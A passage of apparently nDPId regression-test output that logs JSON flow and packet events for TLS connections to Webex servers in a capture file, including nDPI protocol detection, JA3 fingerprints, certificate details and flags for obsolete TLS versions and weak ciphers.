-01861{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570632436,"flow_last_seen":1444570632591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":2966,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1444570632591,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"www.webex.com.au,www.webex.ca,www.webex.de,www.webex.com.hk,www.webex.co.in,www.webex.co.it,www.webex.co.jp,www.webex.com.mx,www.webex.co.uk,m.webex.com,signup.webex.com,signup.webex.co.uk,signup.webex.de,mytrial.webex.com,mytrial.webex.com.mx,mytrial.webex.co.in,mytrial.webex.com.au,mytrial.webex.co.jp,support.webex.com,howdoi.webex.com,kb.webex.com,myresources.webex.com,invoices.webex.com,try.webex.com,buyonline.webex.com,buyonline.webex.de,buyonline.webex.co.uk,tempbol.webex.com,tempsupport.webex.com,www.webex.com,webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=GeoTrust, Inc., CN=GeoTrust SSL CA","subjectDN":"C=US, ST=California, L=San Jose, O=Cisco Systems, OU=IT, CN=www.webex.com","fingerprint":"EE:CE:24:B7:67:4D:F0:3F:16:80:F8:DC:E3:53:45:5F:3E:41:25:CD"}} 
-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570633357,"flow_last_seen":1444570633357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570633357,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1444570633357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570633357,"pkt":"ABoRAAACABoRAAABCABFAAA87DBAAEAGmtcKCAABQERpZ6GOAbtaKC3iAAAAAKACOQht0gAAAgQFtAQCCAoATMHSAAAAAAEDAwY="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1444570633360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570633360,"pkt":"ABoRAAACABoRAAABCABFAAAoAXpAABAGtaJARGlnCggAAQG7oY6l19IdWigt41AS\/\/9Y1AAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1444570633360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570633360,"pkt":"ABoRAAACABoRAAABCABFAAAo7DFAAEAGmuoKCAABQERpZ6GOAbtaKC3jpdfSHlAQOQgfzQAA"} 
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570633357,"flow_last_seen":1444570633362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570633362,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570633357,"flow_last_seen":1444570633811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570633811,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636151,"flow_last_seen":1444570636151,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1444570636151,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636151,"pkt":"ABoRAAACABoRAAABCABFAAA8tbVAAEAGMwwKCAABch3V1KL+AbsYGndcAAAAAKACOQjFmAAAAgQFtAQCCAoATMLpAAAAAAEDAwY="} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1444570636154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636154,"pkt":"ABoRAAACABoRAAABCABFAAAoAY1AABAGF0lyHdXUCggAAQG7ov7n5YijGBp3XVAS\/\/+5HQAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1444570636154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636154,"pkt":"ABoRAAACABoRAAABCABFAAAotbZAAEAGMx8KCAABch3V1KL+AbsYGndd5+WIpFAQOQiAFgAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636155,"flow_last_seen":1444570636155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636155,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1444570636155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636155,"pkt":"ABoRAAACABoRAAABCABFAAA8NxlAAEAGu0sKCAABch3MMcm+AbvkVPXwAAAAAKACOQhdrAAAAgQFtAQCCAoATMLpAAAAAAEDAwY="} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1444570636157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636157,"pkt":"ABoRAAACABoRAAABCABFAAAoAY5AABAGIOtyHcwxCggAAQG7yb4bqwoP5FT18VAS\/\/+cAAAA"} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636151,"flow_last_seen":1444570636157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636157,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1444570636158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636158,"pkt":"ABoRAAACABoRAAABCABFAAAoNxpAAEAGu14KCAABch3MMcm+AbvkVPXxG6sKEFAQOQhi+QAA"} 
-00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636155,"flow_last_seen":1444570636159,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636159,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636160,"flow_last_seen":1444570636160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636160,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1444570636160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636160,"pkt":"ABoRAAACABoRAAABCABFAAA80GxAAEAGr+EKCAAB0cXen7mKAbt7nBKGAAAAAKACOQhH7AAAAgQFtAQCCAoATMLqAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1444570636163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636163,"pkt":"ABoRAAACABoRAAABCABFAAAoAZFAABAGrtHRxd6fCggAAQG7uYqEY+15e5wSh1AS\/\/86HgAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1444570636163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636163,"pkt":"ABoRAAACABoRAAABCABFAAAo0G1AAEAGr\/QKCAAB0cXen7mKAbt7nBKHhGPtelAQOQgBFwAA"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636160,"flow_last_seen":1444570636164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636170,"flow_last_seen":1444570636170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636170,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1444570636170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636170,"pkt":"ABoRAAACABoRAAABCABFAAA8c99AAEAGAvcKCAABQER5meEvAbvnI7E0AAAAAKACOQgMmAAAAgQFtAQCCAoATMLrAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1444570636175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636175,"pkt":"ABoRAAACABoRAAABCABFAAAoAZNAABAGpVdARHmZCggAAQG74S8Y3E7L5yOxNVAS\/\/8JAQAA"} 
-00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1444570636175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636175,"pkt":"ABoRAAACABoRAAABCABFAAAoc+BAAEAGAwoKCAABQER5meEvAbvnI7E1GNxOzFAQOQjP+QAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636170,"flow_last_seen":1444570636176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636176,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636180,"flow_last_seen":1444570636180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636180,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1444570636180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636180,"pkt":"ABoRAAACABoRAAABCABFAAA8nw9AAEAGbDMKCAABPm3nA7L2AbufQl3jAAAAAKACOQhqbwAAAgQFtAQCCAoATMLsAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1444570636183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636183,"pkt":"ABoRAAACABoRAAABCABFAAAoAZVAABAGOcI+becDCggAAQG7svZgvaIcn0Jd5FAS\/\/\/LpgAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1444570636183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636183,"pkt":"ABoRAAACABoRAAABCABFAAAonxBAAEAGbEYKCAABPm3nA7L2AbufQl3kYL2iHVAQOQiSnwAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636180,"flow_last_seen":1444570636185,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636185,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version 
(1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636248,"flow_last_seen":1444570636248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636248,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1444570636248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636248,"pkt":"ABoRAAACABoRAAABCABFAAA8NIdAAEAGU1wKCAABQERojK3MAbt5hvZ2AAAAAKACOQh5XQAAAgQFtAQCCAoATMLxAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1444570636252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636252,"pkt":"ABoRAAACABoRAAABCABFAAAoAZdAABAGtmBARGiMCggAAQG7rcyGeQmJeYb2d1AS\/\/9NcQAA"} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636252,"flow_last_seen":1444570636252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636252,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1444570636252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636252,"pkt":"ABoRAAACABoRAAABCABFAAA80SxAAEAGIt4KCAABch3Ki7gMAbtSShPdAAAAAKACOQjlGgAAAgQFtAQCCAoATMLxAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1444570636255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636255,"pkt":"ABoRAAACABoRAAABCABFAAAoAZhAABAGIodyHcqLCggAAQG7uAyttewiUkoT3lAS\/\/+vWAAA"} 
-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636255,"flow_last_seen":1444570636255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636255,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1444570636255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636255,"pkt":"ABoRAAACABoRAAABCABFAAA870JAAEAGjzEKCAABrfMETM36AbsKei2zAAAAAKACOQiHkAAAAgQFtAQCCAoATMLxAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1444570636259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636259,"pkt":"ABoRAAACABoRAAABCABFAAAoAZlAABAGrO+t8wRMCggAAQG7zfr1hdJMCnottFAS\/\/8j1AAA"} 
